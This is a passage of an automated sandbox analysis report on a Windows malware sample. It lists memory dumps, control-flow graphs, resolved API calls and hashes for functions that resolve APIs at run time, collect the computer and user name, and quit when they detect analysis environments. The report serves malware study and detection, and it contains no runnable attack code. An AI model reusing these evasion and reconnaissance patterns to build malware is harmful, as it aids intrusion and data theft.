                        • Associated: 00000000.00000002.1517531679.0000000000900000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.0000000000937000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.000000000098E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.0000000000996000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.00000000009AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.0000000000B38000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517755970.0000000000B4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000B4C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000CD1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000DB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000DDC000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000DE4000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000DF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1518067758.0000000000DF3000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1518199051.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1518221819.0000000000F8F000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_900000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpy$InternetOpen
                        • String ID: "$------
                        • API String ID: 2041821634-2370822465
                        • Opcode ID: 605539e6e2622fcd7d08524346cdff84a7fc80c77dec7d2cd94e7d6b066948d8
                        • Instruction ID: 2779dc19fec39a703d3acc27789eec086ab81907cb0b020c067be1986f00e113
                        • Opcode Fuzzy Hash: 605539e6e2622fcd7d08524346cdff84a7fc80c77dec7d2cd94e7d6b066948d8
                        • Instruction Fuzzy Hash: 5D528D71A006169FDB21EFA4DD89BAEB7B9AF84300F154424F905F7291DF74EC468BA0
                        Function 00926390 Relevance: 58.0, APIs: 32, Strings: 1, Instructions: 218libraryloaderCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 2125 926390-9263bd GetPEB 2126 9265c3-926623 LoadLibraryA * 5 2125->2126 2127 9263c3-9265be call 9262f0 GetProcAddress * 20 2125->2127 2128 926625-926633 GetProcAddress 2126->2128 2129 926638-92663f 2126->2129 2127->2126 2128->2129 2132 926641-926667 GetProcAddress * 2 2129->2132 2133 92666c-926673 2129->2133 2132->2133 2134 926675-926683 GetProcAddress 2133->2134 2135 926688-92668f 2133->2135 2134->2135 2137 926691-92669f GetProcAddress 2135->2137 2138 9266a4-9266ab 2135->2138 2137->2138 2139 9266d7-9266da 2138->2139 2140 9266ad-9266d2 GetProcAddress * 2 2138->2140 2140->2139
                        APIs
                        • GetProcAddress.KERNEL32(77190000,015E1528), ref: 009263E9
                        • GetProcAddress.KERNEL32(77190000,015E1540), ref: 00926402
                        • GetProcAddress.KERNEL32(77190000,015E16A8), ref: 0092641A
                        • GetProcAddress.KERNEL32(77190000,015E16D8), ref: 00926432
                        • GetProcAddress.KERNEL32(77190000,015E8C08), ref: 0092644B
                        • GetProcAddress.KERNEL32(77190000,015D52E8), ref: 00926463
                        • GetProcAddress.KERNEL32(77190000,015D5168), ref: 0092647B
                        • GetProcAddress.KERNEL32(77190000,015E1738), ref: 00926494
                        • GetProcAddress.KERNEL32(77190000,015E1750), ref: 009264AC
                        • GetProcAddress.KERNEL32(77190000,015E15D0), ref: 009264C4
                        • GetProcAddress.KERNEL32(77190000,015E1510), ref: 009264DD
                        • GetProcAddress.KERNEL32(77190000,015D50C8), ref: 009264F5
                        • GetProcAddress.KERNEL32(77190000,015E1558), ref: 0092650D
                        • GetProcAddress.KERNEL32(77190000,015E1570), ref: 00926526
                        • GetProcAddress.KERNEL32(77190000,015D5348), ref: 0092653E
                        • GetProcAddress.KERNEL32(77190000,015E1588), ref: 00926556
                        • GetProcAddress.KERNEL32(77190000,015E15A0), ref: 0092656F
                        • GetProcAddress.KERNEL32(77190000,015D50E8), ref: 00926587
                        • GetProcAddress.KERNEL32(77190000,015E18B8), ref: 0092659F
                        • GetProcAddress.KERNEL32(77190000,015D5308), ref: 009265B8
                        • LoadLibraryA.KERNEL32(015E17F8,?,?,?,00921C03), ref: 009265C9
                        • LoadLibraryA.KERNEL32(015E1870,?,?,?,00921C03), ref: 009265DB
                        • LoadLibraryA.KERNEL32(015E1810,?,?,?,00921C03), ref: 009265ED
                        • LoadLibraryA.KERNEL32(015E1828,?,?,?,00921C03), ref: 009265FE
                        • LoadLibraryA.KERNEL32(015E1840,?,?,?,00921C03), ref: 00926610
                        • GetProcAddress.KERNEL32(76850000,015E1888), ref: 0092662D
                        • GetProcAddress.KERNEL32(77040000,015E18A0), ref: 00926649
                        • GetProcAddress.KERNEL32(77040000,015E1858), ref: 00926661
                        • GetProcAddress.KERNEL32(75A10000,015E8D80), ref: 0092667D
                        • GetProcAddress.KERNEL32(75690000,015D4F88), ref: 00926699
                        • GetProcAddress.KERNEL32(776F0000,015E8C58), ref: 009266B5
                        • GetProcAddress.KERNEL32(776F0000,NtQueryInformationProcess), ref: 009266CC
                        Strings
                        • NtQueryInformationProcess, xrefs: 009266C1
                        Memory Dump Source
                        • Source File: 00000000.00000002.1517561899.0000000000901000.00000040.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                        • Associated: 00000000.00000002.1517531679.0000000000900000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.0000000000937000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.000000000098E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.0000000000996000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.00000000009AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.0000000000B38000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517755970.0000000000B4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000B4C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000CD1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000DB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000DDC000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000DE4000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000DF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1518067758.0000000000DF3000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1518199051.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1518221819.0000000000F8F000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_900000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: AddressProc$LibraryLoad
                        • String ID: NtQueryInformationProcess
                        • API String ID: 2238633743-2781105232
                        • Opcode ID: 28f5eda6e806fa8a69bcd68e49856e866fe57e7215afef47364cbd7b024234e4
                        • Instruction ID: 717b265d0129ef49901dfed58a366cfcf8f9660edb90cdf2e0a9b40880726bf2
                        • Opcode Fuzzy Hash: 28f5eda6e806fa8a69bcd68e49856e866fe57e7215afef47364cbd7b024234e4
                        • Instruction Fuzzy Hash: A6A162B9A117009FD758DF69EE88A2E37B9F7887403208919F956C3364DFB4A900DF61
                        Function 00921BF0 Relevance: 45.2, APIs: 30, Instructions: 220stringCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 2141 921bf0-921c0b call 902a90 call 926390 2146 921c1a-921c27 call 902930 2141->2146 2147 921c0d 2141->2147 2151 921c35-921c63 2146->2151 2152 921c29-921c2f lstrcpy 2146->2152 2148 921c10-921c18 2147->2148 2148->2146 2148->2148 2156 921c65-921c67 ExitProcess 2151->2156 2157 921c6d-921c7b GetSystemInfo 2151->2157 2152->2151 2158 921c85-921ca0 call 901030 call 9010c0 GetUserDefaultLangID 2157->2158 2159 921c7d-921c7f ExitProcess 2157->2159 2164 921ca2-921ca9 2158->2164 2165 921cb8-921cca call 922ad0 call 923e10 2158->2165 2164->2165 2166 921cb0-921cb2 ExitProcess 2164->2166 2171 921ce7-921d06 lstrlen call 902930 2165->2171 2172 921ccc-921cde call 922a40 call 923e10 2165->2172 2177 921d23-921d40 lstrlen call 902930 2171->2177 2178 921d08-921d0d 2171->2178 2172->2171 2185 921ce0-921ce1 ExitProcess 2172->2185 2186 921d42-921d44 2177->2186 2187 921d5a-921d7b call 922ad0 lstrlen call 902930 2177->2187 2178->2177 2180 921d0f-921d11 2178->2180 2180->2177 2183 921d13-921d1d lstrcpy lstrcat 2180->2183 2183->2177 2186->2187 2188 921d46-921d54 lstrcpy lstrcat 2186->2188 2193 921d9a-921db4 lstrlen call 902930 2187->2193 2194 921d7d-921d7f 2187->2194 2188->2187 2199 921db6-921db8 2193->2199 2200 921dce-921deb call 922a40 lstrlen call 902930 2193->2200 2194->2193 2196 921d81-921d85 2194->2196 2196->2193 2197 921d87-921d94 lstrcpy lstrcat 2196->2197 2197->2193 2199->2200 2201 921dba-921dc8 lstrcpy lstrcat 2199->2201 2206 921e0a-921e0f 2200->2206 2207 921ded-921def 2200->2207 2201->2200 2209 921e11 call 902a20 2206->2209 2210 921e16-921e22 call 902930 2206->2210 2207->2206 2208 921df1-921df5 2207->2208 2208->2206 2213 921df7-921e04 lstrcpy lstrcat 2208->2213 2209->2210 2215 921e30-921e66 call 902a20 * 5 OpenEventA 2210->2215 2216 921e24-921e26 2210->2216 2213->2206 2228 921e68-921e8a CloseHandle Sleep OpenEventA 2215->2228 2229 921e8c-921ea0 CreateEventA call 921b20 call 91ffd0 2215->2229 2216->2215 2217 921e28-921e2a lstrcpy 2216->2217 2217->2215 2228->2228 2228->2229 2233 921ea5-921eae CloseHandle ExitProcess 2229->2233
                        APIs
                          • Part of subcall function 00926390: GetProcAddress.KERNEL32(77190000,015E1528), ref: 009263E9
                          • Part of subcall function 00926390: GetProcAddress.KERNEL32(77190000,015E1540), ref: 00926402
                          • Part of subcall function 00926390: GetProcAddress.KERNEL32(77190000,015E16A8), ref: 0092641A
                          • Part of subcall function 00926390: GetProcAddress.KERNEL32(77190000,015E16D8), ref: 00926432
                          • Part of subcall function 00926390: GetProcAddress.KERNEL32(77190000,015E8C08), ref: 0092644B
                          • Part of subcall function 00926390: GetProcAddress.KERNEL32(77190000,015D52E8), ref: 00926463
                          • Part of subcall function 00926390: GetProcAddress.KERNEL32(77190000,015D5168), ref: 0092647B
                          • Part of subcall function 00926390: GetProcAddress.KERNEL32(77190000,015E1738), ref: 00926494
                          • Part of subcall function 00926390: GetProcAddress.KERNEL32(77190000,015E1750), ref: 009264AC
                          • Part of subcall function 00926390: GetProcAddress.KERNEL32(77190000,015E15D0), ref: 009264C4
                          • Part of subcall function 00926390: GetProcAddress.KERNEL32(77190000,015E1510), ref: 009264DD
                          • Part of subcall function 00926390: GetProcAddress.KERNEL32(77190000,015D50C8), ref: 009264F5
                          • Part of subcall function 00926390: GetProcAddress.KERNEL32(77190000,015E1558), ref: 0092650D
                        • lstrcpy.KERNEL32(00000000,0092CFEC), ref: 00921C2F
                        • ExitProcess.KERNEL32 ref: 00921C67
                        • GetSystemInfo.KERNEL32(?), ref: 00921C71
                        • ExitProcess.KERNEL32 ref: 00921C7F
                          • Part of subcall function 00901030: GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 00901046
                          • Part of subcall function 00901030: VirtualAllocExNuma.KERNEL32(00000000), ref: 0090104D
                          • Part of subcall function 00901030: ExitProcess.KERNEL32 ref: 00901058
                          • Part of subcall function 009010C0: GlobalMemoryStatusEx.KERNEL32 ref: 009010EA
                          • Part of subcall function 009010C0: ExitProcess.KERNEL32 ref: 00901114
                        • GetUserDefaultLangID.KERNEL32 ref: 00921C8F
                        • ExitProcess.KERNEL32 ref: 00921CB2
                        • ExitProcess.KERNEL32 ref: 00921CE1
                        • lstrlen.KERNEL32(015E8B28), ref: 00921CEE
                        • lstrcpy.KERNEL32(00000000,?), ref: 00921D15
                        • lstrcat.KERNEL32(00000000,015E8B28), ref: 00921D1D
                        • lstrlen.KERNEL32(00934B98), ref: 00921D28
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00921D48
                        • lstrcat.KERNEL32(00000000,00934B98), ref: 00921D54
                        • lstrlen.KERNEL32(00000000), ref: 00921D63
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00921D89
                        • lstrcat.KERNEL32(00000000,00000000), ref: 00921D94
                        • lstrlen.KERNEL32(00934B98), ref: 00921D9F
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00921DBC
                        • lstrcat.KERNEL32(00000000,00934B98), ref: 00921DC8
                        • lstrlen.KERNEL32(00000000), ref: 00921DD7
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00921DF9
                        • lstrcat.KERNEL32(00000000,00000000), ref: 00921E04
                        Memory Dump Source
                        • Source File: 00000000.00000002.1517561899.0000000000901000.00000040.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                        • Associated: 00000000.00000002.1517531679.0000000000900000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.0000000000937000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.000000000098E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.0000000000996000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.00000000009AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.0000000000B38000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517755970.0000000000B4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000B4C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000CD1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000DB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000DDC000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000DE4000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000DF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1518067758.0000000000DF3000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1518199051.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1518221819.0000000000F8F000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_900000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: AddressProc$Process$Exitlstrcpy$lstrcatlstrlen$AllocCurrentDefaultGlobalInfoLangMemoryNumaStatusSystemUserVirtual
                        • String ID:
                        • API String ID: 3366406952-0
                        • Opcode ID: 92796f0152a0f48a623fa76a7adec90af6e3b96e4bf5e23a2cdea0cfb092b23c
                        • Instruction ID: 2dcf6f3f1909d793105e009466fad2028238c1be5e79d5357aac4b82483620ce
                        • Opcode Fuzzy Hash: 92796f0152a0f48a623fa76a7adec90af6e3b96e4bf5e23a2cdea0cfb092b23c
                        • Instruction Fuzzy Hash: 3171B031600326AFDB21ABB4ED8DB6E3ABDAF94701F244024F906A71E5DF74D801CB61
                        Function 00904A60 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 119memoryCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 2850 904a60-904afc RtlAllocateHeap 2867 904b7a-904bbe VirtualProtect 2850->2867 2868 904afe-904b03 2850->2868 2869 904b06-904b78 2868->2869 2869->2867
                        APIs
                        • RtlAllocateHeap.NTDLL(00000000), ref: 00904AA2
                        • VirtualProtect.KERNEL32(00000000,00000004,00000100,?), ref: 00904BB0
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1517561899.0000000000901000.00000040.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                        • Associated: 00000000.00000002.1517531679.0000000000900000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.0000000000937000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.000000000098E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.0000000000996000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.00000000009AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.0000000000B38000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517755970.0000000000B4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000B4C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000CD1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000DB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000DDC000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000DE4000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000DF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1518067758.0000000000DF3000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1518199051.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1518221819.0000000000F8F000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_900000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: AllocateHeapProtectVirtual
                        • String ID: The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.
                        • API String ID: 1542196881-3329630956
                        • Opcode ID: 69fdec112976d79293b57cf39b81e22d8c206b883db6780f6e1b85ab94161026
                        • Instruction ID: 10495f5fbddaa6a474990116423e4a5c01eb0024a7de6aa96f8fb72fc32c17e8
                        • Opcode Fuzzy Hash: 69fdec112976d79293b57cf39b81e22d8c206b883db6780f6e1b85ab94161026
                        • Instruction Fuzzy Hash: 3B31CE29B8422D768620EBEF4C4BB5F6E55DFC5FA8F2340A6B50857180C9A16580CFE2
                        Function 00922AD0 Relevance: 4.5, APIs: 3, Instructions: 44memoryCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 2957 922ad0-922b22 GetProcessHeap RtlAllocateHeap GetComputerNameA 2958 922b44-922b59 2957->2958 2959 922b24-922b36 2957->2959
                        APIs
                        • GetProcessHeap.KERNEL32(00000000,00000104,00000000,00000000,?), ref: 00922AFF
                        • RtlAllocateHeap.NTDLL(00000000), ref: 00922B06
                        • GetComputerNameA.KERNEL32(00000000,00000104), ref: 00922B1A
                        Memory Dump Source
                        • Source File: 00000000.00000002.1517561899.0000000000901000.00000040.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                        • Associated: 00000000.00000002.1517531679.0000000000900000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.0000000000937000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.000000000098E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.0000000000996000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.00000000009AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.0000000000B38000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517755970.0000000000B4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000B4C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000CD1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000DB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000DDC000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000DE4000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000DF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1518067758.0000000000DF3000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1518199051.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1518221819.0000000000F8F000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_900000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Heap$AllocateComputerNameProcess
                        • String ID:
                        • API String ID: 1664310425-0
                        • Opcode ID: 475a8b3253687fee323e9e72e220d02881e81bb8e1d7bc64e5304d20fa3d6a4c
                        • Instruction ID: 50e1e778591ba292224aa1cce5278adcf909e673af679a6ce2f5a40ee29d8d95
                        • Opcode Fuzzy Hash: 475a8b3253687fee323e9e72e220d02881e81bb8e1d7bc64e5304d20fa3d6a4c
                        • Instruction Fuzzy Hash: 9901D172A44218ABC710CF99ED45BAEF7BCFB45B21F10026AF919E3780D7B41904CBA1
                        Function 00922A40 Relevance: 4.5, APIs: 3, Instructions: 33memoryCOMMON
                        Download Yara Rule
                        APIs
                        • GetProcessHeap.KERNEL32(00000000,00000104,00000000,00000000,?), ref: 00922A6F
                        • RtlAllocateHeap.NTDLL(00000000), ref: 00922A76
                        • GetUserNameA.ADVAPI32(00000000,00000104), ref: 00922A8A
                        Memory Dump Source
                        • Source File: 00000000.00000002.1517561899.0000000000901000.00000040.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                        • Associated: 00000000.00000002.1517531679.0000000000900000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.0000000000937000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.000000000098E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.0000000000996000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.00000000009AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.0000000000B38000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517755970.0000000000B4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000B4C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000CD1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000DB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000DDC000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000DE4000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000DF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1518067758.0000000000DF3000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1518199051.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1518221819.0000000000F8F000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_900000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Heap$AllocateNameProcessUser
                        • String ID:
                        • API String ID: 1296208442-0
                        • Opcode ID: ea21f6ad95595fa63cd551791decd6b9145011e92def81851480f771231afd8a
                        • Instruction ID: 2b0eb15fca1ddf554a7f999bb8e7d1c407cbbeaf61715b6b22ea7ebd82734b72
                        • Opcode Fuzzy Hash: ea21f6ad95595fa63cd551791decd6b9145011e92def81851480f771231afd8a
                        • Instruction Fuzzy Hash: 42F054B2A44654ABD710DF98DD49F9EBBBCF745B21F100216F915E3680D7B4190486A1
                        Function 009266E0 Relevance: 210.7, APIs: 115, Strings: 5, Instructions: 696libraryloaderCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 633 9266e0-9266e7 634 926afe-926b92 LoadLibraryA * 8 633->634 635 9266ed-926af9 GetProcAddress * 43 633->635 636 926b94-926c03 GetProcAddress * 5 634->636 637 926c08-926c0f 634->637 635->634 636->637 638 926cd2-926cd9 637->638 639 926c15-926ccd GetProcAddress * 8 637->639 640 926cdb-926d4a GetProcAddress * 5 638->640 641 926d4f-926d56 638->641 639->638 640->641 642 926de9-926df0 641->642 643 926d5c-926de4 GetProcAddress * 6 641->643 644 926f10-926f17 642->644 645 926df6-926f0b GetProcAddress * 12 642->645 643->642 646 926f19-926f88 GetProcAddress * 5 644->646 647 926f8d-926f94 644->647 645->644 646->647 648 926fc1-926fc8 647->648 649 926f96-926fbc GetProcAddress * 2 647->649 650 926ff5-926ffc 648->650 651 926fca-926ff0 GetProcAddress * 2 648->651 649->648 652 927002-9270e8 GetProcAddress * 10 650->652 653 9270ed-9270f4 650->653 651->650 652->653 654 927152-927159 653->654 655 9270f6-92714d GetProcAddress * 4 653->655 656 92715b-927169 GetProcAddress 654->656 657 92716e-927175 654->657 655->654 656->657 658 9271d3 657->658 659 927177-9271ce GetProcAddress * 4 657->659 659->658
                        APIs
                        • GetProcAddress.KERNEL32(77190000,015D5068), ref: 009266F5
                        • GetProcAddress.KERNEL32(77190000,015D5088), ref: 0092670D
                        • GetProcAddress.KERNEL32(77190000,015E8FC0), ref: 00926726
                        • GetProcAddress.KERNEL32(77190000,015E8FD8), ref: 0092673E
                        • GetProcAddress.KERNEL32(77190000,015E9008), ref: 00926756
                        • GetProcAddress.KERNEL32(77190000,015EE5F0), ref: 0092676F
                        • GetProcAddress.KERNEL32(77190000,015DA7F8), ref: 00926787
                        • GetProcAddress.KERNEL32(77190000,015EE770), ref: 0092679F
                        • GetProcAddress.KERNEL32(77190000,015EE548), ref: 009267B8
                        • GetProcAddress.KERNEL32(77190000,015EE488), ref: 009267D0
                        • GetProcAddress.KERNEL32(77190000,015EE740), ref: 009267E8
                        • GetProcAddress.KERNEL32(77190000,015D50A8), ref: 00926801
                        • GetProcAddress.KERNEL32(77190000,015D51E8), ref: 00926819
                        • GetProcAddress.KERNEL32(77190000,015D5148), ref: 00926831
                        • GetProcAddress.KERNEL32(77190000,015D5108), ref: 0092684A
                        • GetProcAddress.KERNEL32(77190000,015EE728), ref: 00926862
                        • GetProcAddress.KERNEL32(77190000,015EE668), ref: 0092687A
                        • GetProcAddress.KERNEL32(77190000,015DA528), ref: 00926893
                        • GetProcAddress.KERNEL32(77190000,015D5128), ref: 009268AB
                        • GetProcAddress.KERNEL32(77190000,015EE4A0), ref: 009268C3
                        • GetProcAddress.KERNEL32(77190000,015EE6C8), ref: 009268DC
                        • GetProcAddress.KERNEL32(77190000,015EE710), ref: 009268F4
                        • GetProcAddress.KERNEL32(77190000,015EE608), ref: 0092690C
                        • GetProcAddress.KERNEL32(77190000,015D51A8), ref: 00926925
                        • GetProcAddress.KERNEL32(77190000,015EE5C0), ref: 0092693D
                        • GetProcAddress.KERNEL32(77190000,015EE560), ref: 00926955
                        • GetProcAddress.KERNEL32(77190000,015EE758), ref: 0092696E
                        • GetProcAddress.KERNEL32(77190000,015EE578), ref: 00926986
                        • GetProcAddress.KERNEL32(77190000,015EE4B8), ref: 0092699E
                        • GetProcAddress.KERNEL32(77190000,015EE4D0), ref: 009269B7
                        • GetProcAddress.KERNEL32(77190000,015EE4E8), ref: 009269CF
                        • GetProcAddress.KERNEL32(77190000,015EE5A8), ref: 009269E7
                        • GetProcAddress.KERNEL32(77190000,015EE500), ref: 00926A00
                        • GetProcAddress.KERNEL32(77190000,015DFDA8), ref: 00926A18
                        • GetProcAddress.KERNEL32(77190000,015EE518), ref: 00926A30
